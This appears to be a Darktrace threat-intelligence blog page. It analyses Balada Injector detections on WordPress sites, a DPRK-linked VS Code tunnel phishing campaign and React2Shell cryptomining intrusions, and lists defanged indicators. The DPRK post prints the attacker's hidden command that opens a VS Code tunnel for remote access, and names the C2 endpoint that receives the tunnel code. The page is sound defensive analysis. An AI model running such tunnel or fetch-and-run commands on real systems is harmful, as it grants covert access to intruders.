Blog
/
Network
/
April 8, 2024

Balada Injector: Darktrace’s Investigation into the Malware Exploiting WordPress Vulnerabilities

This blog explores Darktrace’s detection of Balada Injector, a malware known to exploit vulnerabilities in WordPress to gain unauthorized access to networks. Darktrace was able to define numerous use-cases within customer environments which followed previously identified patterns of activity spikes across multiple weeks.
Written by
Justin Torres
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Torres
Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
08
Apr 2024

Introduction

With millions of users relying on digital platforms in their day-to-day lives, and organizations across the world depending on them for their business operations, they have inevitably also become a prime target for threat actors. The widespread exploitation of popular services, websites and platforms in cyber-attacks highlights the pervasive nature of malicious actors in today’s threat landscape.

A prime illustration can be seen within the content management system WordPress. Its widespread use and extensive plug-in ecosystem make it an attractive target for attackers aiming to breach networks and access sensitive data, thus leading to routine exploitation attempts. In the End of Year Threat Report for 2023, for example, Darktrace reported that a vulnerability in one WordPress plug-in, namely an authentication bypass vulnerability in miniOrange's Social Login and Register. Darktrace observed it as one of the most exploited vulnerabilities observed across its customer base in the latter half of 2023.

Between September and October 2023, Darktrace observed a string of campaign-like activity associated with Balada Injector, a malware strain known to exploit vulnerabilities in popular plug-ins and themes on the WordPress platform in order to inject a backdoor to provide further access to affected devices and networks. Thanks to its anomaly-based detection, Darktrace DETECT™ was able to promptly identify suspicious connections associated with the Balada Injector, ensuring that security teams had full visibility over potential post-compromise activity and allowing them to act against offending devices.

What is Balada Injector?

The earliest signs of the Balada Injector campaign date back to 2017; however, it was not designated the name Balada Injector until December 2022 [1]. The malware utilizes plug-ins and themes in WordPress to inject a backdoor that redirects end users to malicious and fake sites. It then exfiltrates sensitive information, such as database credentials, archive files, access logs and other valuable information which may not be properly secured [1]. Balada Injector compromise activity is also reported to arise in spikes of activity that emerge every couple of weeks [4].

In its most recent attack activity patterns, specifically in September 2023, Balada Injector exploited a cross-site scripting (XSS) vulnerability in CVE-2023-3169 associated with the tagDiv composer plug-in. Some of the injection methods observed included HTML injections, database injections, and arbitrary file injections. In late September 2023, a similar pattern of behavior was observed, with the ability to plant a backdoor that could execute PHP code and install a malicious WordPress plug-in, namely ‘wp-zexit’.

According to external security researchers [2], the most recent infection activity spikes for Balada Injector include the following:

Pattern 1: ‘stay.decentralappps[.]com’ injections

Pattern 2: Autogenerated malicious WordPress users

Pattern 3: Backdoors in the Newspaper theme’s 404.php file

Pattern 4: Malicious ‘wp-zexit’ plug-in installation

Pattern 5: Three new Balada Injector domains (statisticscripts[.]com, dataofpages[.]com, and listwithstats[.]com)

Pattern 6: Promsmotion[.]com domain

Darktrace’s Coverage of Balada Injector

Darktrace detected devices across multiple customer environments making external connections to the malicious Balada Injector domains, including those associated with aforementioned six infection activity patterns. Across the incidents investigated by Darktrace, much of the activity appeared to be associated with TLS/SSL connectivity, related to Balada Injector endpoints, which correlated with the reported infection patterns of this malware. The observed hostnames were all recently registered and, in most cases, had IP geolocations in either the Netherlands or Ukraine.

In the observed cases of Balada Injector across the Darktrace fleet, Darktrace RESPOND™ was not active on the affected customer environments. If RESPOND had been active and enabled in autonomous response mode at the time of these attacks, it would have been able to quickly block connections to malicious Balada Injector endpoints as soon as they were identified by DETECT, thereby containing the threat.

Looking within the aforementioned activity patterns, Darktrace identified a Balada Injector activity within a customer’s environment on October 16, 2023, when a device was observed making a total of 9 connection attempts to ‘sleep[.]stratosbody[.]com’, a domain that had previously been associated with the malware [2]. Darktrace recognized that the endpoint had never been seen on the network, with no other devices having connected to it previously, thus treated it as suspicious.

Figure 1: The connection details above demonstrate 100% rare external connections were made from the internal device to the ‘sleep[.]stratosbody[.]com’ endpoint.

Similarly, on September 21, 2023, Darktrace observed a device on another customer network connecting to an external IP that had never previously been observed on the environment, 111.90.141[.]193. The associated server name was a known malicious endpoint, ‘stay.decentralappps[.]com’, known to be utilized by Balada Injector to host malicious scripts used to compromise WordPress sites. Although the ‘stay.decentralappps[.]com’ domain was only registered in September 2023, it was reportedly used in the redirect chain of the aforementioned stratosbody[.com] domain [2]. Such scripts can be used to upload backdoors, including malicious plug-ins, and create blog administrators who can perform administrative tasks without having to authenticate [2].

Figure 2: Advance Search results displaying the metadata logs surrounding the unusual connections to ‘stay.decentralappps[.]com’. A total of nine HTTP CONNECT requests were observed, with status messages “Proxy Authorization Required” and “Connection established”.

Darktrace observed additional connections within the same customer’s environment on October 10 and October 18, specifically SSL connections from two distinct source devices to the ‘stay.decentralappps[.]com’ endpoint. Within these connections, Darktrace observed the normalized JA3 fingerprints, “473f0e7c0b6a0f7b049072f4e683068b” and “aa56c057ad164ec4fdcb7a5a283be9fc”, the latter of which corresponds to GitHub results mentioning a Python client (curl_cffi) that is able to impersonate the TLS signatures of browsers or JA3 fingerprints [8].

Figure 3: Advanced Search query results showcasing Darktrace’s detection of SSL connections to ‘stay.decentralappps[.]com over port 443.

On September 29, 2023, a device on a separate customer’s network was observed connecting to the hostname ‘cdn[.]dataofpages[.]com’, one of the three new Balada Injector domains identified as part of the fifth pattern of activity outlined above, using a new SSL certificate via port 443. Multiple open-source intelligence (OSINT) vendors flagged this domain as malicious and associated with Balada Injector malware [9].

Figure 4: The Model Breach Event Log detailing the Balada Injector-related connections observed causing the ‘Anomalous External Activity from Critical Network Device’ DETECT model to breach.

On October 2, 2023, Darktrace observed the device of another customer connecting to the rare hostname, ‘js.statisticscripts[.]com’ with the IP address 185.39.206[.]161, both of which had only been registered in late September and are known to be associated with the Balada Injector.

Figure 5: Model Breach Event Log detailing connections to the hostname ‘js.statisticscripts[.]com’ over port 137.

On September 13, 2023, Darktrace identified a device on another customer’s network connecting to the Balada Injector endpoint ‘stay.decentralappps[.]com’ endpoint, with the destination IP 1.1.1[.]1, using the SSL protocol. This time, however, Darktrace also observed the device making subsequent connections to ‘get.promsmotion[.]com’ a subdomain of the ‘promsmotion[.]com’ domain. This domain is known to be used by Balada Injector actors to host malicious scripts that can be injected into the WordPress Newspaper theme as potential backdoors to be leveraged by attackers.

In a separate case observed on September 14, Darktrace identified a device on another environment connecting to the domain ‘collect[.]getmygateway[.]com’ with the IP 88.151.192[.]254. No other device on the customer’s network had visited this endpoint previously, and the device in question was observed repeatedly connecting to it via port 443 over the course of four days. While this specific hostname had not been linked with a specific activity pattern of Balada Injector, it was reported as previously associated with the malware in September 2023 [2].

Figure 6: Model Breach Event Log displaying a customer device making repeated connections to the endpoint ‘collect[.]getmygateway[.]com’, breaching the DETECT model ‘Repeating Connections Over 4 Days’.

In addition to DETECT’s identification of this suspicious activity, Darktrace’s Cyber AI Analyst™ also launched its own autonomous investigation into the connections. AI Analyst was able to recognize that these separate connections that took place over several days were, in fact, connected and likely represented command-and-control (C2) beaconing activity that had been taking place on the customer networks.

By analyzing the large number of external connections taking place on a customer’s network at any one time, AI Analyst is able to view seemingly isolated events as components of a wider incident, ensuring that customers maintain full visibility over their environments and any emerging malicious activity.

Figure 7: Cyber AI Analyst investigation detailing the SSL connectivity observed, including endpoint details and overall summary of the beaconing activity.

Conclusion

While Balada Injector’s tendency to interchange C2 infrastructure and utilize newly registered domains may have been able to bypass signature-based security measures, Darktrace’s anomaly-based approach enabled it to swiftly identify affected devices across multiple customer environments, without needing to update or retrain its models to keep pace with the evolving iterations of WordPress vulnerabilities.

Unlike traditional measures, Darktrace DETECT’s Self-Learning AI focusses on behavioral analysis, crucial for identifying emerging threats like those exploiting commonly used platforms such as WordPress. Rather than relying on historical threat intelligence or static indicators of compromise (IoC) lists, Darktrace identifies the subtle deviations in device behavior, such as unusual connections to newly registered domains, that are indicative of network compromise.

Darktrace’s suite of products, including DETECT+RESPOND, is uniquely positioned to proactively identify and contain network compromises from the onset, offering vital protection against disruptive cyber-attacks.

Credit to: Justin Torres, Cyber Analyst, Nahisha Nobregas, Senior Cyber Analyst

Appendices

Darktrace DETECT Model Coverage

  • Anomalous Server Activity / Anomalous External Activity from Critical Network Device
  • Anomalous Connection / Anomalous SSL without SNI to New External
  • Anomalous Connection / Rare External SSL Self-Signed
  • Compliance / Possible DNS Over HTTPS/TLS
  • Compliance / External Windows Communications
  • Compromise / Repeating Connections Over 4 Days
  • Compromise / Beaconing Activity To External Rare
  • Compromise / SSL Beaconing to Rare Destination
  • Compromise / HTTP Beaconing to Rare Destination
  • Compromise / Suspicious TLS Beaconing To Rare External
  • Compromise / Large DNS Volume for Suspicious Domain
  • Anomalous Server Activity / Outgoing from Server
  • Anomalous Server Activity / Rare External from Server
  • Device / Suspicious Domain

List of IoCs

IoC - Type - Description + Confidence

collect[.]getmygateway[.]com - Hostname - Balada C2 Endpoint

cdn[.]dataofpages[.]com - Hostname - Balada C2 Endpoint

stay[.]decentralappps[.]com - Hostname - Balada C2 Endpoint

get[.]promsmotion[.]com - Hostname - Balada C2 Endpoint

js[.]statisticscripts[.]com - Hostname - Balada C2 Endpoint

sleep[.]stratosbody[.]com - Hostname - Balada C2 Endpoint

trend[.]stablelightway[.]com - Hostname - Balada C2 Endpoint

cdn[.]specialtaskevents[.]com - Hostname - Balada C2 Endpoint

88.151.192[.]254 - IP Address - Balada C2 Endpoint

185.39.206[.]160 - IP Address - Balada C2 Endpoint

111.90.141[.]193 - IP Address - Balada C2 Endpoint

185.39.206[.]161 - IP Address - Balada C2 Endpoint

2.59.222[.]121 - IP Address - Balada C2 Endpoint

80.66.79[.]253 - IP Address - Balada C2 Endpoint

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) - User Agent - Observed User Agent in Balada C2 Connections

Gecko/20100101 Firefox/68.0 - User Agent - Observed User Agent in Balada C2 Connections

Mozilla/5.0 (Windows NT 10.0; Win64; x64) - User Agent - Observed User Agent in Balada C2 Connections

AppleWebKit/537.36 (KHTML, like Gecko) - User Agent - Observed User Agent in Balada C2 Connections

Chrome/117.0.0.0 - User Agent - Observed User Agent in Balada C2 Connections

Safari/537.36 - User Agent - Observed User Agent in Balada C2 Connections

Edge/117.0.2045.36 - User Agent - Observed User Agent in Balada C2 Connections

MITRE ATT&CK Mapping

Technique - Tactic - ID - Sub Technique

Exploit Public-Facing Application

INITIAL ACCESS

T1190

Web Protocols

COMMAND AND CONTROL

T1071.001

T1071

Protocol Tunneling

COMMAND AND CONTROL

T1572


Default Accounts

DEFENSE EVASION, PERSISTENCE, PRIVILEGE ESCALATION, INITIAL ACCESS

T1078.001

T1078

Domain Accounts

DEFENSE EVASION, PERSISTENCE, PRIVILEGE ESCALATION, INITIAL ACCESS

T1078.002

T1078

External Remote Services

PERSISTENCE, INITIAL ACCESS

T1133

NA

Local Accounts

DEFENSE EVASION, PERSISTENCE, PRIVILEGE ESCALATION, INITIAL ACCESS

T1078.003

T1078

Application Layer Protocol

COMMAND AND CONTROL

T1071

NA

Browser Extensions

PERSISTENCE

T1176

NA

Encrypted Channel

COMMAND AND CONTROL

T1573

Fallback Channels

COMMAND AND CONTROL

T1008

Multi-Stage Channels

COMMAND AND CONTROL

T1104

Non-Standard Port

COMMAND AND CONTROL

T1571

Supply Chain Compromise

INITIAL ACCESS ICS

T0862

Commonly Used Port

COMMAND AND CONTROL ICS

T0885

References

[1] https://blog.sucuri.net/2023/04/balada-injector-synopsis-of-a-massive-ongoing-wordpress-malware-campaign.html

[2] https://blog.sucuri.net/2023/10/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins.html

[3] https://securityboulevard.com/2021/05/wordpress-websites-redirecting-to-outlook-phishing-pages-travelinskydream-ga-track-lowerskyactive/

[4] https://thehackernews.com/2023/10/over-17000-wordpress-sites-compromised.html

[5] https://www.bleepingcomputer.com/news/security/over-17-000-wordpress-sites-hacked-in-balada-injector-attacks-last-month/

[6]https://nvd.nist.gov/vuln/detail/CVE-2023-3169

[7] https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/

[8] https[:]//github[.]com/yifeikong/curl_cffi/blob/master/README.md

[9] https://www.virustotal.com/gui/domain/cdn.dataofpages.com

Written by
Justin Torres
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Torres
Cyber Analyst

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
Network
January 21, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Darktrace identified a DPRK‑linked campaign targeting South Korean users with JSE‑based spear‑phishing lures. The attackers used government‑themed decoy documents to deploy a VS Code tunnel, enabling covert remote access via trusted Microsoft infrastructure. The activity highlights growing abuse of legitimate tools to evade detection and maintain persistent access.
Read more
Network
January 9, 2026

Maduro Arrest Used as a Lure to Deliver Backdoor

Darktrace researchers observed threat actors exploiting reports of Venezuelan President Maduro’s arrest to deliver backdoor malware. Attackers often use ongoing world events make their malicious content appear more credible, increasingly the likelihood of a successful attack.
Tara Gould
Malware Research Lead
Read more
Network
January 8, 2026

Under Medusa’s Gaze: How Darktrace Uncovers RMM Abuse in Ransomware Campaigns

Medusa ransomware increasingly exploits remote monitoring and management (RMM) tools for persistence, lateral movement, and data exfiltration. This blog explores Medusa’s tactics, real-world detections, and how anomaly-based solutions with Autonomous Response can stop attacks.
Signe Zaharka
Principal Cyber Analyst
Read more

Blog

/

Network

/

January 22, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to https://www.yespp.co.kr/common/include/code/out.php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author

Blog

/

/

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI